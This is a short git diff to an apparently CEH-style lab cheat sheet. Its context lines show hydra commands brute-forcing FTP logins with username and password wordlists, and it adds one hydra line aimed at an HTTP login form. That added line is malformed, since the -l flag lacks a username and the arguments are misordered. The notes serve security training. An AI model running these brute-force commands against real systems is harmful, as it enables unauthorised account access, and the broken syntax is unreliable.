diff --git a/Everything You Need.md b/Everything You Need.md index 859f098..0dca6a8 100644 --- a/Everything You Need.md +++ b/Everything You Need.md @@ -45,6 +45,8 @@ Then go to Desktop and in Ceh tools folder you will find wordlists, here you wil Now in terminal type- hydra -L /home/attacker/Desktop/CEH_TOOLS/Wordlists/Username.txt -P /home/attacker/Desktop/CEH_TOOLS/Wordlists/Password.txt ftp://10.10.10.10 hydra -l user -P passlist.txt ftp://10.10.10.10 + +hydra -l -P 10.10.82.119 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V ``` # Hacking Web Application ```